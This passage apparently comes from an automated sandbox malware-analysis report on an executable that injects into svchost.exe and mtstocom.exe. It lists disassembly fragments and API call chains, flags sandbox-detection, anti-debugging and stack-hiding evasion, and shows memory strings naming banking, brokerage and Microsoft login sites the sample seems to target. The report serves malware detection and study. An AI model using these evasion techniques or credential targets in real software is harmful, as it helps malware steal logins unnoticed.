Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_003214C0 push 051A0F98h; retf	2_2_00321638
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0033AD54 pushad ; ret	2_2_0033AE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0034DD43 push edi; retn 6791h	2_2_0034DE83
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00321596 push 051A0F98h; retf	2_2_00321638
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_003235D0 push eax; ret	2_2_003235D2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0033AE58 pushad ; ret	2_2_0033AE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00334797 pushfd ; retf	2_2_003347E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B009AD push ecx; mov dword ptr [esp], ecx	2_2_00B009B6
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04EB27FA pushad ; ret	7_2_04EB27F9
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04EB225F pushad ; ret	7_2_04EB27F9
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04EB283D push eax; iretd	7_2_04EB2858
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04EE09AD push ecx; mov dword ptr [esp], ecx	7_2_04EE09B6
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_00CA112C push es; ret	7_2_00CA112B
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_00C921C0 push ebx; retf	7_2_00C921CA
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_00C921BD push ebx; retf	7_2_00C921CA
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_00C9448B push esi; retf 4925h	7_2_00C944BE
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_00C8E6C1 push ebx; ret	7_2_00C8E6C2
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_00CAA770 push edi; retn 6791h	7_2_00CAA8B0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_00C90AC0 pushfd ; ret	7_2_00C90AC6
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_00C94AD3 push ds; retf	7_2_00C94AD4
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_00C94B95 push ecx; iretd	7_2_00C94B96

Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Code function: 0_2_0077F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_0077F98E
Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Code function: 0_2_007F1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_007F1C41

Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\Desktop\FG5wHs4fVX.exe

Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

graph_0-97609

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	API/Special instruction interceptor: Address: 12444CC
Source: C:\Windows\SysWOW64\mtstocom.exe	API/Special instruction interceptor: Address: 7FF90818D324
Source: C:\Windows\SysWOW64\mtstocom.exe	API/Special instruction interceptor: Address: 7FF90818D7E4
Source: C:\Windows\SysWOW64\mtstocom.exe	API/Special instruction interceptor: Address: 7FF90818D944
Source: C:\Windows\SysWOW64\mtstocom.exe	API/Special instruction interceptor: Address: 7FF90818D504
Source: C:\Windows\SysWOW64\mtstocom.exe	API/Special instruction interceptor: Address: 7FF90818D544
Source: C:\Windows\SysWOW64\mtstocom.exe	API/Special instruction interceptor: Address: 7FF90818D1E4
Source: C:\Windows\SysWOW64\mtstocom.exe	API/Special instruction interceptor: Address: 7FF908190154
Source: C:\Windows\SysWOW64\mtstocom.exe	API/Special instruction interceptor: Address: 7FF90818DA44

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_00B4096E rdtsc

2_2_00B4096E

Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	API coverage: 4.2 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\mtstocom.exe	API coverage: 2.7 %

Source: C:\Windows\SysWOW64\mtstocom.exe TID: 7332

Thread sleep time: -58000s >= -30000s

Jump to behavior

Source: C:\Windows\SysWOW64\mtstocom.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\mtstocom.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Code function: 0_2_007CDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_007CDBBE
Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Code function: 0_2_0079C2A2 FindFirstFileExW,	0_2_0079C2A2
Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Code function: 0_2_007D68EE FindFirstFileW,FindClose,	0_2_007D68EE
Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Code function: 0_2_007D698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_007D698F
Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Code function: 0_2_007CD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_007CD076
Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Code function: 0_2_007CD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_007CD3A9
Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Code function: 0_2_007D9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_007D9642
Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Code function: 0_2_007D979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_007D979D
Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Code function: 0_2_007D9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_007D9B2B
Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Code function: 0_2_007D5C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_007D5C97
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_00C9C4D0 FindFirstFileW,FindNextFileW,FindClose,	7_2_00C9C4D0

Source: C:\Users\user\Desktop\FG5wHs4fVX.exe

Code function: 0_2_007642DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_007642DE

Source: 04EL04J45.7.dr	Binary or memory string: dev.azure.comVMware20,11696497155j
Source: 04EL04J45.7.dr	Binary or memory string: global block list test formVMware20,11696497155
Source: 04EL04J45.7.dr	Binary or memory string: turbotax.intuit.comVMware20,11696497155t
Source: 04EL04J45.7.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
Source: 04EL04J45.7.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
Source: 04EL04J45.7.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696497155\|UE
Source: 04EL04J45.7.dr	Binary or memory string: tasks.office.comVMware20,11696497155o
Source: 04EL04J45.7.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
Source: 04EL04J45.7.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
Source: iiYhUrEPyAr.exe, 00000008.00000002.2634079187.00000000006DF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 04EL04J45.7.dr	Binary or memory string: bankofamerica.comVMware20,11696497155x
Source: 04EL04J45.7.dr	Binary or memory string: ms.portal.azure.comVMware20,11696497155
Source: 04EL04J45.7.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
Source: 04EL04J45.7.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
Source: 04EL04J45.7.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
Source: mtstocom.exe, 00000007.00000002.2633609388.0000000003266000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllv
Source: 04EL04J45.7.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
Source: firefox.exe, 0000000A.00000002.2338815750.000001CF6D69C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
Source: 04EL04J45.7.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
Source: 04EL04J45.7.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
Source: 04EL04J45.7.dr	Binary or memory string: interactivebrokers.comVMware20,11696497155
Source: 04EL04J45.7.dr	Binary or memory string: AMC password management pageVMware20,11696497155
Source: 04EL04J45.7.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
Source: 04EL04J45.7.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
Source: 04EL04J45.7.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
Source: 04EL04J45.7.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
Source: 04EL04J45.7.dr	Binary or memory string: discord.comVMware20,11696497155f
Source: 04EL04J45.7.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
Source: 04EL04J45.7.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
Source: 04EL04J45.7.dr	Binary or memory string: outlook.office365.comVMware20,11696497155t
Source: 04EL04J45.7.dr	Binary or memory string: outlook.office.comVMware20,11696497155s
Source: 04EL04J45.7.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
Source: 04EL04J45.7.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
Source: 04EL04J45.7.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_00B4096E rdtsc

2_2_00B4096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_003379E3 LdrLoadDll,

2_2_003379E3

Source: C:\Users\user\Desktop\FG5wHs4fVX.exe

Code function: 0_2_007DEAA2 BlockInput,

0_2_007DEAA2

Source: C:\Users\user\Desktop\FG5wHs4fVX.exe

Code function: 0_2_00792622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00792622

Source: C:\Users\user\Desktop\FG5wHs4fVX.exe

Code function: 0_2_007642DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_007642DE

Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Code function: 0_2_00784CE8 mov eax, dword ptr fs:[00000030h]	0_2_00784CE8
Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Code function: 0_2_01244738 mov eax, dword ptr fs:[00000030h]	0_2_01244738
Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Code function: 0_2_01244798 mov eax, dword ptr fs:[00000030h]	0_2_01244798
Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Code function: 0_2_01243128 mov eax, dword ptr fs:[00000030h]	0_2_01243128
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BC60B8 mov eax, dword ptr fs:[00000030h]	2_2_00BC60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BC60B8 mov ecx, dword ptr fs:[00000030h]	2_2_00BC60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B980A8 mov eax, dword ptr fs:[00000030h]	2_2_00B980A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B0208A mov eax, dword ptr fs:[00000030h]	2_2_00B0208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B420F0 mov ecx, dword ptr fs:[00000030h]	2_2_00B420F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00AFA0E3 mov ecx, dword ptr fs:[00000030h]	2_2_00AFA0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B860E0 mov eax, dword ptr fs:[00000030h]	2_2_00B860E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B080E9 mov eax, dword ptr fs:[00000030h]	2_2_00B080E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00AFC0F0 mov eax, dword ptr fs:[00000030h]	2_2_00AFC0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B820DE mov eax, dword ptr fs:[00000030h]	2_2_00B820DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B96030 mov eax, dword ptr fs:[00000030h]	2_2_00B96030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00AFA020 mov eax, dword ptr fs:[00000030h]	2_2_00AFA020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00AFC020 mov eax, dword ptr fs:[00000030h]	2_2_00AFC020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B1E016 mov eax, dword ptr fs:[00000030h]	2_2_00B1E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B1E016 mov eax, dword ptr fs:[00000030h]	2_2_00B1E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B1E016 mov eax, dword ptr fs:[00000030h]	2_2_00B1E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B1E016 mov eax, dword ptr fs:[00000030h]	2_2_00B1E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B84000 mov ecx, dword ptr fs:[00000030h]	2_2_00B84000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BA2000 mov eax, dword ptr fs:[00000030h]	2_2_00BA2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BA2000 mov eax, dword ptr fs:[00000030h]	2_2_00BA2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BA2000 mov eax, dword ptr fs:[00000030h]	2_2_00BA2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BA2000 mov eax, dword ptr fs:[00000030h]	2_2_00BA2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BA2000 mov eax, dword ptr fs:[00000030h]	2_2_00BA2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BA2000 mov eax, dword ptr fs:[00000030h]	2_2_00BA2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BA2000 mov eax, dword ptr fs:[00000030h]	2_2_00BA2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BA2000 mov eax, dword ptr fs:[00000030h]	2_2_00BA2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B2C073 mov eax, dword ptr fs:[00000030h]	2_2_00B2C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B02050 mov eax, dword ptr fs:[00000030h]	2_2_00B02050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B86050 mov eax, dword ptr fs:[00000030h]	2_2_00B86050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B8019F mov eax, dword ptr fs:[00000030h]	2_2_00B8019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B8019F mov eax, dword ptr fs:[00000030h]	2_2_00B8019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B8019F mov eax, dword ptr fs:[00000030h]	2_2_00B8019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B8019F mov eax, dword ptr fs:[00000030h]	2_2_00B8019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B40185 mov eax, dword ptr fs:[00000030h]	2_2_00B40185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BBC188 mov eax, dword ptr fs:[00000030h]	2_2_00BBC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BBC188 mov eax, dword ptr fs:[00000030h]	2_2_00BBC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00AFA197 mov eax, dword ptr fs:[00000030h]	2_2_00AFA197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00AFA197 mov eax, dword ptr fs:[00000030h]	2_2_00AFA197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00AFA197 mov eax, dword ptr fs:[00000030h]	2_2_00AFA197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BA4180 mov eax, dword ptr fs:[00000030h]	2_2_00BA4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BA4180 mov eax, dword ptr fs:[00000030h]	2_2_00BA4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B301F8 mov eax, dword ptr fs:[00000030h]	2_2_00B301F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BD61E5 mov eax, dword ptr fs:[00000030h]	2_2_00BD61E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B7E1D0 mov eax, dword ptr fs:[00000030h]	2_2_00B7E1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B7E1D0 mov eax, dword ptr fs:[00000030h]	2_2_00B7E1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B7E1D0 mov ecx, dword ptr fs:[00000030h]	2_2_00B7E1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B7E1D0 mov eax, dword ptr fs:[00000030h]	2_2_00B7E1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B7E1D0 mov eax, dword ptr fs:[00000030h]	2_2_00B7E1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BC61C3 mov eax, dword ptr fs:[00000030h]	2_2_00BC61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BC61C3 mov eax, dword ptr fs:[00000030h]	2_2_00BC61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B30124 mov eax, dword ptr fs:[00000030h]	2_2_00B30124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BAA118 mov ecx, dword ptr fs:[00000030h]	2_2_00BAA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BAA118 mov eax, dword ptr fs:[00000030h]	2_2_00BAA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BAA118 mov eax, dword ptr fs:[00000030h]	2_2_00BAA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BAA118 mov eax, dword ptr fs:[00000030h]	2_2_00BAA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BC0115 mov eax, dword ptr fs:[00000030h]	2_2_00BC0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BAE10E mov eax, dword ptr fs:[00000030h]	2_2_00BAE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BAE10E mov ecx, dword ptr fs:[00000030h]	2_2_00BAE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BAE10E mov eax, dword ptr fs:[00000030h]	2_2_00BAE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BAE10E mov eax, dword ptr fs:[00000030h]	2_2_00BAE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BAE10E mov ecx, dword ptr fs:[00000030h]	2_2_00BAE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BAE10E mov eax, dword ptr fs:[00000030h]	2_2_00BAE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BAE10E mov eax, dword ptr fs:[00000030h]	2_2_00BAE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BAE10E mov ecx, dword ptr fs:[00000030h]	2_2_00BAE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BAE10E mov eax, dword ptr fs:[00000030h]	2_2_00BAE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BAE10E mov ecx, dword ptr fs:[00000030h]	2_2_00BAE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B98158 mov eax, dword ptr fs:[00000030h]	2_2_00B98158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B06154 mov eax, dword ptr fs:[00000030h]	2_2_00B06154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B06154 mov eax, dword ptr fs:[00000030h]	2_2_00B06154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00AFC156 mov eax, dword ptr fs:[00000030h]	2_2_00AFC156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B94144 mov eax, dword ptr fs:[00000030h]	2_2_00B94144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B94144 mov eax, dword ptr fs:[00000030h]	2_2_00B94144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B94144 mov ecx, dword ptr fs:[00000030h]	2_2_00B94144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B94144 mov eax, dword ptr fs:[00000030h]	2_2_00B94144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B94144 mov eax, dword ptr fs:[00000030h]	2_2_00B94144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B102A0 mov eax, dword ptr fs:[00000030h]	2_2_00B102A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B102A0 mov eax, dword ptr fs:[00000030h]	2_2_00B102A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B962A0 mov eax, dword ptr fs:[00000030h]	2_2_00B962A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B962A0 mov ecx, dword ptr fs:[00000030h]	2_2_00B962A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B962A0 mov eax, dword ptr fs:[00000030h]	2_2_00B962A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B962A0 mov eax, dword ptr fs:[00000030h]	2_2_00B962A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B962A0 mov eax, dword ptr fs:[00000030h]	2_2_00B962A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B962A0 mov eax, dword ptr fs:[00000030h]	2_2_00B962A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B3E284 mov eax, dword ptr fs:[00000030h]	2_2_00B3E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B3E284 mov eax, dword ptr fs:[00000030h]	2_2_00B3E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B80283 mov eax, dword ptr fs:[00000030h]	2_2_00B80283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B80283 mov eax, dword ptr fs:[00000030h]	2_2_00B80283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B80283 mov eax, dword ptr fs:[00000030h]	2_2_00B80283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B102E1 mov eax, dword ptr fs:[00000030h]	2_2_00B102E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B102E1 mov eax, dword ptr fs:[00000030h]	2_2_00B102E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B102E1 mov eax, dword ptr fs:[00000030h]	2_2_00B102E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B0A2C3 mov eax, dword ptr fs:[00000030h]	2_2_00B0A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B0A2C3 mov eax, dword ptr fs:[00000030h]	2_2_00B0A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B0A2C3 mov eax, dword ptr fs:[00000030h]	2_2_00B0A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B0A2C3 mov eax, dword ptr fs:[00000030h]	2_2_00B0A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B0A2C3 mov eax, dword ptr fs:[00000030h]	2_2_00B0A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00AF823B mov eax, dword ptr fs:[00000030h]	2_2_00AF823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00AF826B mov eax, dword ptr fs:[00000030h]	2_2_00AF826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BB0274 mov eax, dword ptr fs:[00000030h]	2_2_00BB0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BB0274 mov eax, dword ptr fs:[00000030h]	2_2_00BB0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BB0274 mov eax, dword ptr fs:[00000030h]	2_2_00BB0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BB0274 mov eax, dword ptr fs:[00000030h]	2_2_00BB0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BB0274 mov eax, dword ptr fs:[00000030h]	2_2_00BB0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BB0274 mov eax, dword ptr fs:[00000030h]	2_2_00BB0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BB0274 mov eax, dword ptr fs:[00000030h]	2_2_00BB0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BB0274 mov eax, dword ptr fs:[00000030h]	2_2_00BB0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BB0274 mov eax, dword ptr fs:[00000030h]	2_2_00BB0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BB0274 mov eax, dword ptr fs:[00000030h]	2_2_00BB0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BB0274 mov eax, dword ptr fs:[00000030h]	2_2_00BB0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BB0274 mov eax, dword ptr fs:[00000030h]	2_2_00BB0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B04260 mov eax, dword ptr fs:[00000030h]	2_2_00B04260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B04260 mov eax, dword ptr fs:[00000030h]	2_2_00B04260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B04260 mov eax, dword ptr fs:[00000030h]	2_2_00B04260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B06259 mov eax, dword ptr fs:[00000030h]	2_2_00B06259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B88243 mov eax, dword ptr fs:[00000030h]	2_2_00B88243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B88243 mov ecx, dword ptr fs:[00000030h]	2_2_00B88243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00AFA250 mov eax, dword ptr fs:[00000030h]	2_2_00AFA250
